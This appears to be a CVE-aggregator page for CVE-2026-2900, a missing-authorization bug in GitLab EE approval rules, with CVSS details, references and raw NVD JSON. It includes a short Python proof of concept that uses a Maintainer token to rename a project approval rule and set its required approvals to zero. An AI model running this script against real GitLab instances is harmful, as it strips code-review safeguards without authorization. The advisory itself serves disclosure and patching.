CVE-2026-2900

Description

GitLab has remediated an issue in GitLab EE affecting all versions from 16.10 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that when instance-level approval rule editing prevention was enabled, could have allowed an authenticated user with Maintainer permissions to modify or delete project approval rules due to missing authorization checks.

CVSS Details

CVSS Score

2.7

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

GitLab EE 16.10 至 18.9.7 之前

GitLab EE 18.10 至 18.10.6 之前

GitLab EE 18.11 至 18.11.3 之前

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Configuration
TARGET_URL = "https://gitlab.example.com"
PROJECT_ID = "123"
RULE_ID = "456"
TOKEN = "glpat-maintainer_token_here"

headers = {
    "PRIVATE-TOKEN": TOKEN,
    "Content-Type": "application/json"
}

# Exploit payload: Modify approval rule
payload = {
    "name": "Hijacked Rule",
    "approvals_required": 0
}

# Send request to modify the rule
endpoint = f"{TARGET_URL}/api/v4/projects/{PROJECT_ID}/approval_rules/{RULE_ID}"
response = requests.put(endpoint, json=payload, headers=headers)

if response.status_code == 200:
    print("[+] Successfully modified/deleted approval rule.")
else:
    print(f"[-] Failed. Status code: {response.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2900
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2900
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2900/
[4] VulDB https://vuldb.com/cve/CVE-2026-2900
[5] https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/
[6] https://gitlab.com/gitlab-org/gitlab/-/work_items/590983
[7] https://hackerone.com/reports/3561092

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2900", "sourceIdentifier": "[email protected]", "published": "2026-05-14T06:16:21.803", "lastModified": "2026-05-14T16:20:43.240", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 16.10 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that when instance-level approval rule editing prevention was enabled, could have allowed an authenticated user with Maintainer permissions to modify or delete project approval rules due to missing authorization checks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/", "source": "[email protected]"}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/590983", "source": "[email protected]"}, {"url": "https://hackerone.com/reports/3561092", "source": "[email protected]"}]}}